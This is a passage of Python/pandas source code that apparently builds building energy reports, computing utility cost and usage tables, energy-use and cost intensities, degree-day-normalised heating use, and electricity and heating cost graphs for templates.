# --------- Table 1, Yearly Table
# Filter down to just this site's bills and only services that
# are energy services.
energy_services = bu.missing_energy_services([])
df1 = df.query('site_id==@site and service_type==@energy_services')
# Only do this table if there are energy services.
if not df1.empty:
# Sum Energy Costs and Usage
df2 = pd.pivot_table(df1, index='fiscal_year', values=['cost', 'mmbtu'], aggfunc=np.sum)
# Add a column showing number of months present in each fiscal year.
bu.add_month_count_column(df2, df1)
# Make a column with just the Heat MMBtu
dfe = df1.query("service_type=='electricity'").groupby('fiscal_year').sum()[['mmbtu']]
dfe.rename(columns={'mmbtu': 'elec_mmbtu'}, inplace = True)
df2 = df2.merge(dfe, how='left', left_index=True, right_index=True)
df2['elec_mmbtu'] = df2['elec_mmbtu'].fillna(0.0)
df2['heat_mmbtu'] = df2.mmbtu - df2.elec_mmbtu
# Add in degree days to DataFrame
months_present = bu.months_present(df1)
deg_days = ut.degree_days_yearly(months_present, site)
df2['hdd'] = deg_days
# Get building square footage and calculate EUIs and ECI.
sq_ft = ut.building_info(site)['sq_ft']
df2['eui'] = df2.mmbtu * 1e3 / sq_ft
df2['eci'] = df2.cost / sq_ft
df2['specific_eui'] = df2.heat_mmbtu * 1e6 / df2.hdd / sq_ft
# Restrict to full years
df2 = df2.query("month_count == 12").copy()
# Reverse the years
df2.sort_index(ascending=False, inplace=True)
# get the rows as a list of dictionaries and put into
# final template data dictionary.
template_data['energy_index_comparison']['yearly_table'] = {
'rows': bu.df_to_dictionaries(df2)
}
# ---------- Table 2, Details Table
# Use the last complete year for this site as the year for the Details
# table. If there was no complete year for the site, then use the
# last complete year for the entire dataset.
if 'df2' in locals() and len(df2):
last_complete_year = df2.index.max()
else:
# Determine month count by year for Electricity in entire dataset
# to determine the latest complete year.
electric_only = df.query("service_type == 'electricity'")
electric_months_present = bu.months_present(electric_only)
electric_mo_count = bu.month_count(electric_months_present)
last_complete_year = max(electric_mo_count[electric_mo_count==12].index)
# Filter down to just the records of the targeted fiscal year
df1 = df.query('fiscal_year == @last_complete_year')
# Get Total Utility cost by building. This includes non-energy utilities as well.
df2 = df1.pivot_table(index='site_id', values=['cost'], aggfunc=np.sum)
df2.columns = ['total_cost']
# Save this into the Final DataFrame that we will build up as we go.
df_final = df2.copy()
# Get a list of the Energy Services and restrict the data to
# just these services
energy_svcs = bu.missing_energy_services([])
df2 = df1.query('service_type == @energy_svcs')
# Summarize Cost by Service Type
df3 = pd.pivot_table(df2, index='site_id', columns='service_type', values='cost', aggfunc=np.sum)
# Add in any missing columns
bu.add_missing_columns(df3, energy_svcs)
# Change column names
cols = ['{}_cost'.format(col) for col in df3.columns]
df3.columns = cols
# Add a total energy cost column
df3['total_energy_cost'] = df3.sum(axis=1)
# Add a total Heat Cost Column
df3['total_heat_cost'] = df3.total_energy_cost.fillna(0.0) - df3.electricity_cost.fillna(0.0)
# Add this to the final DataFrame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Summarize MMBtu by Service Type
df3 = pd.pivot_table(df2, index='site_id', columns='service_type', values='mmbtu', aggfunc=np.sum)
# Add in any missing columns
bu.add_missing_columns(df3, energy_svcs)
# Change column names
cols = ['{}_mmbtu'.format(col) for col in df3.columns]
df3.columns = cols
# Add a total mmbtu column
df3['total_mmbtu'] = df3.sum(axis=1)
# Add a total Heat mmbtu Column
df3['total_heat_mmbtu'] = df3.total_mmbtu.fillna(0.0) - df3.electricity_mmbtu.fillna(0.0)
# Add this to the final DataFrame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Electricity kWh summed by building
df3 = pd.pivot_table(df2.query('units == "kWh"'), index='site_id', values='usage', aggfunc=np.sum)
df3.columns = ['electricity_kwh']
# Include in Final DF
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Electricity kW, both Average and Max by building
# First, sum up kW pieces for each month.
df3 = df2.query('units == "kW"').groupby(['site_id', 'fiscal_year', 'fiscal_mo']).sum()
df3 = pd.pivot_table(df3.reset_index(), index='site_id', values='usage', aggfunc=[np.mean, np.max])
df3.columns = ['electricity_kw_average', 'electricity_kw_max']
# Add into Final Frame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Add in Square footage info
df_bldg = ut.building_info_df()[['sq_ft']]
# Add into Final Frame. I do a merge here so as not to bring
# in buildings from the building info spreadsheet that are not in this
# dataset; this dataset has been restricted to one year.
df_final = pd.merge(df_final, df_bldg, how='left', left_index=True, right_index=True)
# Build a DataFrame that has monthly degree days for each site/year/month
# combination.
combos = set(zip(df1.site_id, df1.fiscal_year, df1.fiscal_mo))
df_dd = pd.DataFrame(data=list(combos), columns=['site_id', 'fiscal_year', 'fiscal_mo'])
ut.add_degree_days_col(df_dd)
# Add up the degree days by site (we've already filtered down to one year or less
# of data.)
dd_series = df_dd.groupby('site_id').sum()['degree_days']
# Put in final DataFrame
df_final = pd.concat([df_final, dd_series], axis=1)
# Add in a column that gives the number of months present for each site
# in this year. Then filter down to just the sites that have 12 months
# of data.
df_final.reset_index(inplace=True)
df_final['fiscal_year'] = last_complete_year
df_final.set_index(['site_id', 'fiscal_year'], inplace=True)
df_final = bu.add_month_count_column_by_site(df_final, df2)
df_final = df_final.query('month_count==12').copy()
df_final.reset_index(inplace=True)
df_final.set_index('site_id', inplace=True)
# Calculate per square foot values for each building.
df_final['eui'] = df_final.total_mmbtu * 1e3 / df_final.sq_ft
df_final['eci'] = df_final.total_energy_cost / df_final.sq_ft
df_final['specific_eui'] = df_final.total_heat_mmbtu * 1e6 / df_final.sq_ft / df_final.degree_days
# Save this to a spreadsheet, if it has not already been saved
fn = 'output/extra_data/site_summary_FY{}.xlsx'.format(last_complete_year)
if not os.path.exists(fn):
excel_writer = pd.ExcelWriter(fn)
df_final.to_excel(excel_writer, sheet_name='Sites')
# Get the totals across all buildings
totals_all_bldgs = df_final.sum()
# Total Degree-Days are not relevant
totals_all_bldgs.drop(['degree_days'], inplace=True)
# Only use the set of buildings that have some energy use and non-zero
# square footage to determine EUI's and ECI's
energy_bldgs = df_final.query("total_mmbtu > 0 and sq_ft > 0")
# Get total square feet, energy use, and energy cost for these buildings
# and calculate EUI and ECI
sq_ft_energy_bldgs = energy_bldgs.sq_ft.sum()
energy_in_energy_bldgs = energy_bldgs.total_mmbtu.sum()
energy_cost_in_energy_bldgs = energy_bldgs.total_energy_cost.sum()
totals_all_bldgs['eui'] = energy_in_energy_bldgs * 1e3 / sq_ft_energy_bldgs
totals_all_bldgs['eci'] = energy_cost_in_energy_bldgs / sq_ft_energy_bldgs
# For calculating heating specific EUI, further filter the set of
# buildings down to those that have heating fuel use.
# Get separate square footage total and weighted average degree-day for these.
heat_bldgs = energy_bldgs.query("total_heat_mmbtu > 0")
heat_bldgs_sq_ft = heat_bldgs.sq_ft.sum()
heat_bldgs_heat_mmbtu = heat_bldgs.total_heat_mmbtu.sum()
heat_bldgs_degree_days = (heat_bldgs.total_heat_mmbtu * heat_bldgs.degree_days).sum() / heat_bldgs.total_heat_mmbtu.sum()
totals_all_bldgs['specific_eui'] = heat_bldgs_heat_mmbtu * 1e6 / heat_bldgs_sq_ft / heat_bldgs_degree_days
# calculate a rank DataFrame
df_rank = pd.DataFrame()
for col in df_final.columns:
df_rank[col] = df_final[col].rank(ascending=False)
if site in df_final.index:
# The site exists in the DataFrame
site_info = df_final.loc[site]
site_pct = site_info / totals_all_bldgs
site_rank = df_rank.loc[site]
else:
# Site is not there, probabaly because not present in this year.
# Make variables with NaN values for all elements.
site_info = df_final.iloc[0].copy() # Just grab the first row to start with
site_info[:] = np.NaN # Put
site_pct = site_info.copy()
site_rank = site_info.copy()
# Make a final dictioary to hold all the results for this table
tbl2_data = {
'fiscal_year': 'FY {}'.format(last_complete_year),
'bldg': site_info.to_dict(),
'all': totals_all_bldgs.to_dict(),
'pct': site_pct.to_dict(),
'rank': site_rank.to_dict()
}
template_data['energy_index_comparison']['details_table'] = tbl2_data
# -------------- Energy Comparison Graphs ---------------
# Filter down to only services that are energy services.
energy_services = bu.missing_energy_services([])
df4 = df.query('service_type==@energy_services').copy()
# Sum Energy Costs and Usage
df5 = pd.pivot_table(df4, index=['site_id', 'fiscal_year'], values=['cost', 'mmbtu'], aggfunc=np.sum)
# Add a column showing number of months present in each fiscal year.
df5 = bu.add_month_count_column_by_site(df5, df4)
# Create an Electric MMBtu column so it can be subtracted from total to determine
# Heat MMBtu.
dfe = df4.query("service_type=='Electricity'").groupby(['site_id', 'fiscal_year']).sum()[['mmbtu']]
dfe.rename(columns={'mmbtu': 'elec_mmbtu'}, inplace = True)
df5 = df5.merge(dfe, how='left', left_index=True, right_index=True)
df5['elec_mmbtu'] = df5['elec_mmbtu'].fillna(0.0)
df5['heat_mmbtu'] = df5.mmbtu - df5.elec_mmbtu
# Add in degree-days:
# Create a DataFrame with site, year, month and degree-days, but only one row
# for each site/year/month combo.
dfd = df4[['site_id', 'fiscal_year', 'fiscal_mo']].copy()
dfd.drop_duplicates(inplace=True)
ut.add_degree_days_col(dfd)
# Use the agg function below so that a NaN will be returned for the year
# if any monthly values are NaN
dfd = dfd.groupby(['site_id', 'fiscal_year']).agg({'degree_days': lambda x: np.sum(x.values)})[['degree_days']]
df5 = df5.merge(dfd, how='left', left_index=True, right_index=True)
# Add in some needed building info like square footage, primary function
# and building category.
df_bldg = ut.building_info_df()
# Shrink to just the needed fields and remove index.
# Also, fill blank values with 'Unknown'.
df_info = df_bldg[['sq_ft', 'site_category', 'primary_func']].copy().reset_index()
df_info['site_category'] = df_info.site_category.fillna('Unknown')
df_info['primary_func'] = df_info.primary_func.fillna('Unknown Type')
# Also Remove the index from df5 and merge in building info
df5.reset_index(inplace=True)
df5 = df5.merge(df_info, how='left')
# Now calculate per square foot energy measures
df5['eui'] = df5.mmbtu * 1e3 / df5.sq_ft
df5['eci'] = df5.cost / df5.sq_ft
df5['specific_eui'] = df5.heat_mmbtu * 1e6 / df5.degree_days / df5.sq_ft
# Restrict to full years
df5 = df5.query("month_count == 12").copy()
# Make all of the comparison graphs
g1_fn, g1_url = gu.graph_filename_url(site, 'eci_func')
gu.building_type_comparison_graph(df5, 'eci', site, g1_fn)
g2_fn, g2_url = gu.graph_filename_url(site, 'eci_owner')
gu.building_owner_comparison_graph(df5, 'eci', site, g2_fn)
g3_fn, g3_url = gu.graph_filename_url(site, 'eui_func')
gu.building_type_comparison_graph(df5, 'eui', site, g3_fn)
g4_fn, g4_url = gu.graph_filename_url(site, 'eui_owner')
gu.building_owner_comparison_graph(df5, 'eui', site, g4_fn)
g5_fn, g5_url = gu.graph_filename_url(site, 'speui_func')
gu.building_type_comparison_graph(df5, 'specific_eui', site, g5_fn)
g6_fn, g6_url = gu.graph_filename_url(site, 'speui_owner')
gu.building_owner_comparison_graph(df5, 'specific_eui', site, g6_fn)
template_data['energy_index_comparison']['graphs'] = [
g1_url, g2_url, g3_url, g4_url, g5_url, g6_url
]
return template_data
# ------------------ Utility Cost Overview Report ----------------------
def utility_cost_report(site, df, ut):
"""As well as return the template data, this function returns a utility cost
DataFrame that is needed in the Heating Cost Analysis Report.
"""
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'cost']]
# Summarize cost by fiscal year and service type.
df2 = pd.pivot_table(
df1,
values='cost',
index=['fiscal_year'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
missing_services = bu.missing_services(df2.columns)
bu.add_columns(df2, missing_services)
# Add a Total column that sums the other columns
df2['total'] = df2.sum(axis=1)
# Add a percent change column
df2['pct_change'] = df2.total.pct_change()
# Add in degree days
months_present = bu.months_present(df1)
deg_days = ut.degree_days_yearly(months_present, site)
df2['hdd'] = deg_days
# Add in a column to show the numbers of months present for each year
# This will help to identify partial years.
bu.add_month_count_column(df2, df1)
# trim out the partial years
if len(df2):
df2 = df2.query("month_count == 12").copy()
# Reverse the DataFrame
df2.sort_index(ascending=False, inplace=True)
# Reset the index so the fiscal year column can be passed to the graphing utility
reset_df2 = df2.reset_index()
# Save a copy of this DataFrame to return for use in the
# Heating Cost Analysis Report
df_utility_cost = reset_df2.copy()
# Get appropriate file names and URLs for the graph
g1_fn, g1_url = gu.graph_filename_url(site, 'util_cost_ovw_g1')
# make the area cost distribution graph
utility_list = bu.all_services.copy()
gu.area_cost_distribution(reset_df2, 'fiscal_year', utility_list, g1_fn);
# make the stacked bar graph
g2_fn, g2_url = gu.graph_filename_url(site, 'util_cost_ovw_g2')
gu.create_stacked_bar(reset_df2, 'fiscal_year', utility_list, 'Utility Cost ($)', "Annual Cost by Utility Type",g2_fn)
# Put results into the final dictionary that will be passed to the Template.
# A function is used to convert the DataFrame into a list of dictionaries.
template_data = dict(
utility_cost_overview = dict(
graphs=[g1_url, g2_url],
table={'rows': bu.df_to_dictionaries(df2)}
)
)
return template_data, df_utility_cost
# -------------------- Energy Use and Cost Reports -----------------------
def energy_use_cost_reports(site, df, ut, df_utility_cost):
"""This does both the Energy Usage report and the Energy Cost & Usage
Pie charts.
'df_utility_cost' is a summary utility cost DataFrame from the prior
function.
As well as returnin the template data, this function returns a summary
energy usage dataframe.
"""
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
usage_df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'mmbtu']]
# Total mmbtu by service type and year.
usage_df2 = pd.pivot_table(
usage_df1,
values='mmbtu',
index=['fiscal_year'],
columns=['service_type'],
aggfunc=np.sum
)
# drop non-energy columns
non_energy_servics = list(set(bu.all_services) - set(bu.all_energy_services))
usage_df2 = usage_df2[usage_df2.columns.difference(non_energy_servics)]
# Add in columns for the missing services
missing_services = bu.missing_energy_services(usage_df2.columns)
bu.add_columns(usage_df2, missing_services)
# Add a Total column that sums the other columns
usage_df2['total_energy'] = usage_df2.sum(axis=1)
cols = ['{}_mmbtu'.format(col) for col in usage_df2.columns]
usage_df2.columns = cols
# Create a list of columns to loop through and calculate percent total energy
usage_cols = list(usage_df2.columns.values)
usage_cols.remove('total_energy_mmbtu')
for col in usage_cols:
col_name = col.split('_mmbtu')[0] + "_pct"
usage_df2[col_name] = usage_df2[col] / usage_df2.total_energy_mmbtu
# Add in degree days
months_present = bu.months_present(usage_df1)
deg_days = ut.degree_days_yearly(months_present, site)
usage_df2['hdd'] = deg_days
# Add in a column to show the numbers of months present for each year
# This will help to identify partial years.
mo_count = bu.month_count(months_present)
usage_df2['month_count'] = mo_count
# Calculate total heat energy and normalized heating usage
usage_df2['total_heat_mmbtu'] = usage_df2.total_energy_mmbtu - usage_df2.electricity_mmbtu
usage_df2['total_specific_heat'] = usage_df2.total_heat_mmbtu * 1000 / usage_df2.hdd
usage_df2 = usage_df2.query("month_count == 12").copy()
# Reverse the DataFrame
usage_df2.sort_index(ascending=False, inplace=True)
usage_df2 = usage_df2.drop('month_count', axis=1)
# --- Create Energy Usage Overview Graphs
# Reset the index so the fiscal year column can be passed to the graphing function
reset_usage_df2 = usage_df2.reset_index()
p4g2_filename, p4g2_url = gu.graph_filename_url(site, 'energy_usage_ovw_g2')
# Create the area graph
gu.area_use_distribution(reset_usage_df2, 'fiscal_year', usage_cols, p4g2_filename)
# The stacked bar graph
p4g1_filename, p4g1_url = gu.graph_filename_url(site, 'energy_usage_ovw_g1')
gu.energy_use_stacked_bar(reset_usage_df2, 'fiscal_year', usage_cols, p4g1_filename)
# Convert df to dictionary
energy_use_overview_rows = bu.df_to_dictionaries(usage_df2)
# Put data and graphs into a dictionary
template_data = dict(
energy_usage_overview = dict(
graphs=[p4g1_url, p4g2_url],
table={'rows': energy_use_overview_rows}
)
)
# Make a utility list to include only energy-related columns
utility_list = bu.all_energy_services.copy()
pie_urls = gu.usage_pie_charts(usage_df2.fillna(0.0), usage_cols, 1, 'energy_usage_pie', site)
# Make the other graphs and append the URLs
df_ut_cost = df_utility_cost.set_index('fiscal_year') # need fiscal_year index for graphs
pie_urls += gu.usage_pie_charts(df_ut_cost.fillna(0.0),
utility_list,
2,
'energy_cost_pie',
site)
# Add pie charts to template dictionary
template_data['energy_cost_usage'] = dict(graphs=pie_urls)
return template_data, usage_df2
# -------------------- Electrical Usage and Cost Reports -------------------------
def electrical_usage_and_cost_reports(site, df):
"""This does both the Electrical Usage and Electrical
Cost reports."""
site_df = df.query("site_id == @site")
electric_df = site_df.query("units == 'kWh' or units == 'kW'")
if 'electricity' in site_df.service_type.unique() and site_df.query("service_type == 'electricity'")['usage'].sum(axis=0) > 0:
# only look at elecricity records
electric_pivot_monthly = pd.pivot_table(electric_df,
index=['fiscal_year', 'fiscal_mo'],
columns=['units'],
values='usage',
aggfunc=np.sum)
else:
# Create an empty dataframe with the correct index
electric_pivot_monthly = site_df.groupby(['fiscal_year', 'fiscal_mo']).mean()[[]]
# Add in missing electricity columns and fill them with zeros
electric_pivot_monthly = bu.add_missing_columns(electric_pivot_monthly, ['kWh', 'kW'])
electric_pivot_monthly.kW.fillna(0.0)
electric_pivot_monthly.kWh.fillna(0.0)
# Do a month count for the elecricity bills
elec_months_present = bu.months_present(electric_pivot_monthly.reset_index())
elec_mo_count = bu.month_count(elec_months_present)
elec_mo_count_df = pd.DataFrame(elec_mo_count)
elec_mo_count_df.index.name = 'fiscal_year'
if 'kWh' in site_df.units.unique() or 'kW' in site_df.units.unique():
electric_pivot_annual = pd.pivot_table(electric_df,
index=['fiscal_year'],
columns=['units'],
values='usage',
aggfunc=np.sum
)
else:
# Create an empty dataframe with the correct index
electric_pivot_annual = site_df.groupby(['fiscal_year']).mean()[[]]
electric_pivot_annual = bu.add_missing_columns(electric_pivot_annual, ['kWh', 'kW'])
electric_use_annual = electric_pivot_annual[['kWh']]
electric_use_annual = electric_use_annual.rename(columns={'kWh':'ann_electric_usage_kWh'})
# Get average annual demand usage
electric_demand_avg = electric_pivot_monthly.groupby(['fiscal_year']).mean()
electric_demand_avg = electric_demand_avg[['kW']]
electric_demand_avg = electric_demand_avg.rename(columns={'kW': 'avg_demand_kW'})
# Find annual maximum demand usage
electric_demand_max = electric_pivot_monthly.groupby(['fiscal_year']).max()
electric_demand_max = electric_demand_max[['kW']]
electric_demand_max = electric_demand_max.rename(columns={'kW': 'max_demand_kW'})
# Combine dataframes
electric_demand_join = pd.merge(electric_demand_max, electric_demand_avg, how='outer', left_index=True, right_index=True)
annual_electric_data = pd.merge(electric_demand_join, electric_use_annual, how='outer', left_index=True, right_index=True)
# Add percent change columns
annual_electric_data['usage_pct_change'] = annual_electric_data.ann_electric_usage_kWh.pct_change()
annual_electric_data['avg_demand_pct_change'] = annual_electric_data.avg_demand_kW.pct_change()
annual_electric_data['max_demand_pct_change'] = annual_electric_data.max_demand_kW.pct_change()
annual_electric_data = annual_electric_data.rename(columns={'avg_demand_kW': 'Average kW',
'ann_electric_usage_kWh': 'Total kWh'})
annual_electric_data = pd.merge(annual_electric_data, elec_mo_count_df, left_index=True, right_index=True, how='left')
annual_electric_data = annual_electric_data.query("month == 12")
annual_electric_data = annual_electric_data.sort_index(ascending=False)
annual_electric_data = annual_electric_data.rename(columns={'max_demand_kW':'kw_max',
'Average kW':'kw_avg',
'Total kWh':'kwh',
'usage_pct_change':'kwh_pct_change',
'avg_demand_pct_change':'kw_avg_pct_change',
'max_demand_pct_change':'kw_max_pct_change'})
annual_electric_data = annual_electric_data.drop('month', axis=1)
# ---- Create Electrical Usage Analysis Graphs - Page 6
# Axes labels
ylabel1 = 'Electricity Usage [kWh]'
ylabel2 = 'Electricity Demand [kW]'
p6g1_filename, p6g1_url = gu.graph_filename_url(site, "electricity_usage_g1")
gu.stacked_bar_with_line(annual_electric_data.reset_index(), 'fiscal_year', ['kwh'], 'kw_avg',
ylabel1, ylabel2, "Annual Electricity Usage and Demand", p6g1_filename)
p6g2_filename, p6g2_url = gu.graph_filename_url(site, "electricity_usage_g2")
gu.create_monthly_profile(electric_pivot_monthly, 'kWh', 'Monthly Electricity Usage Profile [kWh]', 'blue',
"Monthly Electricity Usage Profile by Fiscal Year",p6g2_filename)
# Convert df to dictionary
electric_use_rows = bu.df_to_dictionaries(annual_electric_data)
# Put data and graphs in a dictionary
template_data = dict(
electrical_usage_analysis = dict(
graphs=[p6g1_url, p6g2_url],
table={'rows': electric_use_rows}
)
)
# only look at elecricity records
electric_cost_df = site_df.query("service_type == 'electricity'").copy()
# Costs don't always have units, so split the data into demand charges and usage charges (which includes other charges)
electric_cost_df['cost_categories'] = np.where(electric_cost_df.item_desc.isin(['KW Charge', 'On peak demand', 'Demand Charge']),
'demand_cost', 'usage_cost')
if 'electricity' in site_df.service_type.unique():
# Sum costs by demand and usage
electric_annual_cost = pd.pivot_table(electric_cost_df,
index=['fiscal_year'],
columns=['cost_categories'],
values='cost',
aggfunc=np.sum
)
else:
electric_annual_cost = site_df.groupby(['fiscal_year']).mean()[[]]
electric_annual_cost = bu.add_missing_columns(electric_annual_cost, ['demand_cost', 'usage_cost'] ,0.0)
# Create a total column
electric_annual_cost['Total Cost'] = electric_annual_cost[['demand_cost', 'usage_cost']].sum(axis=1)
# Add percent change columns
electric_annual_cost['usage_cost_pct_change'] = electric_annual_cost.usage_cost.pct_change()
electric_annual_cost['demand_cost_pct_change'] = electric_annual_cost.demand_cost.pct_change()
electric_annual_cost['total_cost_pct_change'] = electric_annual_cost['Total Cost'].pct_change()
# Left join the cost data to the annual electric data, which only shows complete years
electric_use_and_cost = pd.merge(annual_electric_data, electric_annual_cost, left_index=True, right_index=True, how='left')
electric_use_and_cost = electric_use_and_cost.sort_index(ascending=False)
electric_use_and_cost = electric_use_and_cost.drop(['kw_max', 'kw_max_pct_change'], axis=1)
electric_use_and_cost = electric_use_and_cost.rename(columns={'demand_cost':'kw_avg_cost',
'usage_cost':'kwh_cost',
'Total Cost':'total_cost',
'usage_cost_pct_change':'kwh_cost_pct_change',
'demand_cost_pct_change':'kw_avg_cost_pct_change'
})
# --- Create Electrical Cost Analysis Graphs
p7g1_filename, p7g1_url = gu.graph_filename_url(site, "electrical_cost_g1")
renamed_use_and_cost = electric_use_and_cost.rename(columns={'kwh_cost':'Electricity Usage Cost [$]',
'kw_avg_cost':'Electricity Demand Cost [$]'})
gu.create_stacked_bar(renamed_use_and_cost.reset_index(), 'fiscal_year', ['Electricity Usage Cost [$]',
'Electricity Demand Cost [$]'],
'Electricity Cost [$]', "Annual Electricity Usage and Demand Costs", p7g1_filename)
# Create Monthly Profile of Electricity Demand
p7g2_filename, p7g2_url = gu.graph_filename_url(site, "electrical_cost_g2")
gu.create_monthly_profile(electric_pivot_monthly, 'kW', 'Monthly Electricity Demand Profile [kW]', 'blue',
"Monthly Electricity Demand Profile by Fiscal Year",p7g2_filename)
# Convert df to dictionary
electric_cost_rows = bu.df_to_dictionaries(electric_use_and_cost)
# Add data and graphs to main dictionary
template_data['electrical_cost_analysis'] = dict(
graphs=[p7g1_url, p7g2_url],
table={'rows': electric_cost_rows},
)
return template_data
# --------------------Heating Usage and Cost Reports ------------------------
def heating_usage_cost_reports(site, df, ut, df_utility_cost, df_usage):
'''This produces both the Heating Usage and the Heating Cost
reports.
'df_utility_cost': The utility cost DataFrame produced in the
utility_cost_report function above.
'df_usage': A summary energy usage DataFrame produced in the prior
energy_use_cost_reports function.
'''
# Abort if no heating usage
if df_usage.empty:
return {}
heat_service_mmbtu_list = []
for heat_service in bu.all_heat_services:
heat_service_mmbtu_list.append(heat_service + '_mmbtu')
keep_cols_list = heat_service_mmbtu_list + ['hdd', 'total_heat_mmbtu']
heating_usage = df_usage[keep_cols_list].copy()
# Add in percent change columns
# First sort so the percent change column is correct and then re-sort the other direction
heating_usage.sort_index(ascending=True, inplace=True)
for heating_service in heat_service_mmbtu_list:
new_col_name = heating_service.split('_mmbtu')[0] + '_pct_change'
heating_usage[new_col_name] = heating_usage[heating_service].pct_change()
heating_usage['total_heat_pct_change'] = heating_usage.total_heat_mmbtu.pct_change()
# Now reset the sorting
heating_usage.sort_index(ascending=False, inplace=True)
# Get the number of gallons, ccf, and cords of wood by converting MMBTUs using the supplied conversions
# This is hard-coded because I couldn't figure out how to do it more generically
heating_usage['fuel_oil_usage'] = heating_usage.fuel_oil_mmbtu * 1000000 / ut.service_category_info('fuel_oil')[1]
heating_usage['natural_gas_usage'] = heating_usage.natural_gas_mmbtu * 1000000 / ut.service_category_info('natural_gas')[1]
heating_usage['propane_usage'] = heating_usage.propane_mmbtu * 1000000 / ut.service_category_info('propane')[1]
heating_usage['wood_usage'] = heating_usage.wood_mmbtu * 1000000 / ut.service_category_info('wood')[1]
heating_usage['coal_usage'] = heating_usage.coal_mmbtu * 1000000 / ut.service_category_info('coal')[1]
# ----- Create Heating Usage Analysis Graphs
p8g1_filename, p8g1_url = gu.graph_filename_url(site, "heating_usage_g1")
gu.stacked_bar_with_line(heating_usage.reset_index(), 'fiscal_year', heat_service_mmbtu_list, 'hdd',
'Heating Fuel Usage [MMBTU/yr]', 'Heating Degree Days [Base 65F]',
"Annual Heating Energy Use and Degree Day Comparison", p8g1_filename)
# --- Create Monthly Heating Usage dataframe for graph
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
usage_df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'mmbtu']]
monthly_heating = pd.pivot_table(usage_df1,
values='mmbtu',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing energy services
missing_services = bu.missing_energy_services(monthly_heating.columns)
bu.add_columns(monthly_heating, missing_services)
# Use only heat services
monthly_heating = monthly_heating[bu.all_heat_services]
# Create a total heating column
monthly_heating['total_heating_energy'] = monthly_heating.sum(axis=1)
p8g2_filename, p8g2_url = gu.graph_filename_url(site, "heating_usage_g2")
gu.create_monthly_profile(monthly_heating, 'total_heating_energy', "Monthly Heating Energy Profile [MMBTU]", 'red',
"Monthly Heating Energy Usage Profile by Fiscal Year", p8g2_filename)
# Convert df to dictionary
heating_use_rows = bu.df_to_dictionaries(heating_usage)
# Add data and graphs to a dictionary
template_data = dict(
heating_usage_analysis = dict(
graphs=[p8g1_url, p8g2_url],
table={'rows': heating_use_rows}
)
)
# Using the Utility Cost DataFrame passed in as a parameter,
# Put DataFrame back into ascending order, as we need to calculate
# a percent change column.
# Index is NOT Years
df_utility_cost.sort_values('fiscal_year', ascending=True, inplace=True)
# Make a total heat cost column and it's percent change
df_utility_cost['total_heat_cost'] = df_utility_cost[bu.all_heat_services].sum(axis=1)
df_utility_cost['total_heat_cost_pct_change'] = df_utility_cost.total_heat_cost.pct_change()
# Now back in descending order
df_utility_cost.sort_values('fiscal_year', ascending=False, inplace=True)
cols_to_keep = bu.all_heat_services + ['fiscal_year', 'total_heat_cost','total_heat_cost_pct_change']
# Use only necessary columns
heating_cost = df_utility_cost[cols_to_keep]
cost_cols = [col + "_cost" for col in bu.all_heat_services]
cost_col_dict = dict(zip(bu.all_heat_services, cost_cols))
# Change column names so they aren't the same as the heating usage dataframe
heating_cost = heating_cost.rename(columns=cost_col_dict)
# Combine the heating cost and heating use dataframes
heating_cost_and_use = pd.merge(heating_cost, heating_usage, left_on='fiscal_year', right_index=True, how='right')
# Put DataFrame in ascending order to calculate percent change
heating_cost_and_use.sort_values('fiscal_year', ascending=True, inplace=True)
# This will be used to shorten final dataframe
final_cost_col_list = list(cost_cols)
# Create percent change columns
for col in cost_cols:
new_col = col.split('_cost')[0] + '_pct_change'
heating_cost_and_use[new_col] = heating_cost_and_use[col].pct_change()
final_cost_col_list.append(new_col)
# Back to descending order
heating_cost_and_use.sort_values('fiscal_year', ascending=False, inplace=True)
# Create unit cost columns
for col in cost_cols:
n_col = col.split('_cost')[0] + '_unit_cost'
mmbtu_col = col.split('_cost')[0] + '_mmbtu'
heating_cost_and_use[n_col] = heating_cost_and_use[col] / heating_cost_and_use[mmbtu_col]
final_cost_col_list.append(n_col)
heating_cost_and_use['building_heat_unit_cost'] = heating_cost_and_use.total_heat_cost / heating_cost_and_use.total_heat_mmbtu
# Remove all columns not needed for the Heating Cost Analysis Table
final_cost_col_list = final_cost_col_list + ['fiscal_year','building_heat_unit_cost',
'total_heat_cost','total_heat_cost_pct_change']
heating_cost_and_use = heating_cost_and_use[final_cost_col_list]
# ---- Create DataFrame with the Monthly Average Price Per MMBTU for All Sites
# Filter out natural gas customer charges as the unit cost goes to infinity if there is a charge but no use
df_no_gas_cust_charges = df.drop(df[(df['service_type'] == 'natural_gas') & (df['units'] != 'CCF')].index)
# Filter out records with zero usage, which correspond to things like customer charges, etc.
nonzero_usage = df_no_gas_cust_charges.query("usage > 0")
nonzero_usage = nonzero_usage.query("mmbtu > 0")
# Filter out zero cost or less records (these are related to waste oil)
nonzero_usage = nonzero_usage.query("cost > 0")
# Get the total fuel cost and usage for all buildings by year and month
grouped_nonzero_usage = nonzero_usage.groupby(['service_type', 'fiscal_year', 'fiscal_mo']).sum()
# Divide the total cost for all building by the total usage for all buildings so that the average is weighted correctly
grouped_nonzero_usage['avg_price_per_mmbtu'] = grouped_nonzero_usage.cost / grouped_nonzero_usage.mmbtu
# Get only the desired outcome, price per million BTU for each fuel type, and the number of calendar months it is based on
# i.e. the number of months of bills for each fuel for all buildings for that particular month.
grouped_nonzero_usage = grouped_nonzero_usage[['avg_price_per_mmbtu', 'cal_mo']]
# Drop electricity from the dataframe.
grouped_nonzero_usage = grouped_nonzero_usage.reset_index()
grouped_nonzero_heatfuel_use = grouped_nonzero_usage.query("service_type != 'Electricity'")
# Create a column for each service type
grouped_nonzero_heatfuel_use = pd.pivot_table(grouped_nonzero_heatfuel_use,
values='avg_price_per_mmbtu',
index=['fiscal_year', 'fiscal_mo'],
columns='service_type'
)
grouped_nonzero_heatfuel_use = grouped_nonzero_heatfuel_use.reset_index()
